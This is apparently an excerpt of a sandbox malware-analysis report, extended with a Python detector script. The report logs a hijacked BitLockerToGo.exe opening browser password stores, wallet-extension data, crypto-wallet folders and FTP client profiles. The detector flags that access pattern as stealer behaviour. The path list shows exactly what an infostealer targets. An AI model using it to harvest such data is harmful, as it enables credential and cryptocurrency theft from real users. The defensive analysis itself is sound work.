Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: Yara match File source: 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2985106102.0000000000830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2982362975.000000000082E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 320, type: MEMORYSTR
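The access pattern logged above is the detection signal a defender would want to automate: a process that is not a browser or wallet application (here the hollowed, Microsoft-signed BitLockerToGo.exe) enumerating browser credential stores, extension storage for wallet extensions, desktop wallet directories and FTP client profiles in one sweep. The following Python is an added example, not part of the Joe Sandbox report; it parses "Source: ... File opened/Directory queried: ..." lines in the report's own format, buckets each path into a data-store category, discounts the browser reading its own profile, and raises a stealer verdict when one foreign process hits two or more credential categories. The category regexes, the expected-owner table (chrome.exe / msedge.exe / firefox.exe) and the two-category threshold are this example's assumptions; the sample lines are constructed from the report's entries plus one benign control line.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# One report line: "Source: <process path> File opened|Directory queried: <path>"
EVENT_RE = re.compile(
    r"^Source: (?P<proc>.+?) (?P<action>File opened|Directory queried): (?P<path>.+?)\s*$"
)

# Data-store categories (assumption: patterns taken from the paths in this report).
RULES = [
    ("browser_credentials",
     re.compile(r"\\(Login Data|Login Data For Account|logins\.json|key4\.db)$", re.I)),
    ("browser_history", re.compile(r"\\places\.sqlite$", re.I)),
    # Chrome extension IDs are 32 letters a-p; wallet extensions keep keys here.
    ("browser_extension", re.compile(r"\\Local Extension Settings\\[a-p]{32}$", re.I)),
    ("crypto_wallet", re.compile(
        r"\\(Exodus\\exodus\.wallet|Ledger Live|atomic\\Local Storage\\leveldb"
        r"|Coinomi\\Coinomi\\wallets|Bitcoin\\wallets|Binance|com\.liberty\.jaxx\\IndexedDB"
        r"|Electrum(-LTC)?\\wallets|Guarda\\IndexedDB)$", re.I)),
    ("ftp_client", re.compile(
        r"\\(FTPbox|SmartFTP\\Client 2\.0\\Favorites|FTPGetter|FTPInfo"
        r"|SiteDesigner\\3D-FTP|FTPRush)$", re.I)),
    ("user_documents", re.compile(r"\\Documents(\\|$)", re.I)),
]

# Which process legitimately reads each browser profile (assumption; a real
# deployment would widen this with backup agents, password managers, etc.).
BROWSER_OWNERS = [
    (re.compile(r"\\Google\\Chrome\\", re.I), {"chrome.exe"}),
    (re.compile(r"\\Microsoft\\Edge\\", re.I), {"msedge.exe"}),
    (re.compile(r"\\Mozilla\\Firefox\\", re.I), {"firefox.exe"}),
]

# Hitting two or more of these from one foreign process is the stealer signature.
STEALER_CATEGORIES = {"browser_credentials", "browser_extension", "crypto_wallet", "ftp_client"}

# Constructed sample: entries shaped like the report's, plus a benign control line
# (chrome.exe opening its own Login Data) that must not produce a finding.
SAMPLE_EVENTS = r"""
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
"""


def parse_event(line):
    """Return (process_path, action, target_path) or None for non-event lines."""
    m = EVENT_RE.match(line.strip())
    return (m.group("proc"), m.group("action"), m.group("path")) if m else None


def classify(path):
    """Map a target path to a data-store category, or None if uninteresting."""
    for category, rx in RULES:
        if rx.search(path):
            return category
    return None


def expected_owners(path):
    """Process names allowed to touch this path; empty set means any access counts."""
    for rx, owners in BROWSER_OWNERS:
        if rx.search(path):
            return owners
    return set()


def analyze(log_text):
    """Aggregate foreign-process accesses per process and assign a verdict."""
    findings = defaultdict(lambda: {"categories": set(), "hits": 0})
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        proc, _action, path = ev
        category = classify(path)
        if category is None:
            continue
        proc_name = PureWindowsPath(proc).name.lower()
        if proc_name in expected_owners(path):
            continue  # the browser reading its own profile is normal
        findings[proc_name]["categories"].add(category)
        findings[proc_name]["hits"] += 1
    report = {}
    for proc_name, f in findings.items():
        stealer_hits = f["categories"] & STEALER_CATEGORIES
        verdict = "stealer-pattern" if len(stealer_hits) >= 2 else "review"
        report[proc_name] = {"categories": sorted(f["categories"]),
                             "hits": f["hits"], "verdict": verdict}
    return report


if __name__ == "__main__":
    for proc_name, finding in analyze(SAMPLE_EVENTS).items():
        print(f"{proc_name}: {finding['verdict']} ({finding['hits']} hits) {finding['categories']}")
```

Run against the report's full behaviour log, the same logic would attribute every entry in this section to bitlockertogo.exe and return stealer-pattern; the one thing it deliberately does not do is trust the signer of the accessing binary, since here the process image is a legitimate Windows component hosting injected code.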

Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 10.0.7C81.exe.7ff7d4c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.7C81.exe.7ff7d4c00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.2860245379.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2960028925.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7C81.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\7C81.exe, type: DROPPED
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 320, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
[Legend of the IP distribution map: buckets of < 25%, 25-50%, 50-75% and > 75% of contacted IPs]